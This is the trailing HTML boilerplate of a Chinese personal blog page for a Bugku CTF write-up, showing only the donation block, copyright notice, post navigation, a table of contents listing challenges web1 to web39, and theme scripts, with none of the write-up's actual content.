        <img src="/images/wechatpay.png" alt="WJW 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="WJW 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>WJW
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://chutingting520.github.io/2021/03/22/bugku/" title="bugku">https://chutingting520.github.io/2021/03/22/bugku/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/13/SSTI%E6%B3%A8%E5%85%A5/" rel="prev" title="SSTI注入">
      <i class="fa fa-chevron-left"></i> SSTI注入
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/03/22/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C/" rel="next" title="攻防学习">
      攻防学习 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#web1"><span class="nav-number">1.</span> <span class="nav-text">web1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web2"><span class="nav-number">2.</span> <span class="nav-text">web2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web3"><span class="nav-number">3.</span> <span class="nav-text">web3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web4"><span class="nav-number">4.</span> <span class="nav-text">web4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web5"><span class="nav-number">5.</span> <span class="nav-text">web5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web6"><span class="nav-number">6.</span> <span class="nav-text">web6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web7"><span class="nav-number">7.</span> <span class="nav-text">web7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web8"><span class="nav-number">8.</span> <span class="nav-text">web8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web9"><span class="nav-number">9.</span> <span class="nav-text">web9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web10"><span class="nav-number">10.</span> <span class="nav-text">web10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web11"><span class="nav-number">11.</span> <span class="nav-text">web11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web12"><span class="nav-number">12.</span> <span class="nav-text">web12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web13"><span class="nav-number">13.</span> <span class="nav-text">web13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web14"><span class="nav-number">14.</span> <span class="nav-text">web14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web15"><span class="nav-number">15.</span> <span class="nav-text">web15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web16"><span class="nav-number">16.</span> <span class="nav-text">web16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web17"><span class="nav-number">17.</span> <span class="nav-text">web17</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web18"><span class="nav-number">18.</span> <span class="nav-text">web18</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web19"><span class="nav-number">19.</span> <span class="nav-text">web19</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web20"><span class="nav-number">20.</span> <span class="nav-text">web20</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web21"><span class="nav-number">21.</span> <span class="nav-text">web21</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web22"><span class="nav-number">22.</span> <span class="nav-text">web22</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web23"><span class="nav-number">23.</span> <span class="nav-text">web23</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web24"><span class="nav-number">24.</span> <span class="nav-text">web24</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web25"><span class="nav-number">25.</span> <span class="nav-text">web25</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web26"><span class="nav-number">26.</span> <span class="nav-text">web26</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web27"><span class="nav-number">27.</span> <span class="nav-text">web27</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web28"><span class="nav-number">28.</span> <span class="nav-text">web28</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web29"><span class="nav-number">29.</span> <span class="nav-text">web29</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web30"><span class="nav-number">30.</span> <span class="nav-text">web30</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web31"><span class="nav-number">31.</span> <span class="nav-text">web31</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web32"><span class="nav-number">32.</span> <span class="nav-text">web32</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web33"><span class="nav-number">33.</span> <span class="nav-text">web33</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web34"><span class="nav-number">34.</span> <span class="nav-text">web34</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web35"><span class="nav-number">35.</span> <span class="nav-text">web35</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web36"><span class="nav-number">36.</span> <span class="nav-text">web36</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web37"><span class="nav-number">37.</span> <span class="nav-text">web37</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web38"><span class="nav-number">38.</span> <span class="nav-text">web38</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web39"><span class="nav-number">39.</span> <span class="nav-text">web39</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="WJW"
      src="/images/cat.jpg">
  <p class="site-author-name" itemprop="name">WJW</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">61</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">WJW</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">258k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">3:54</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
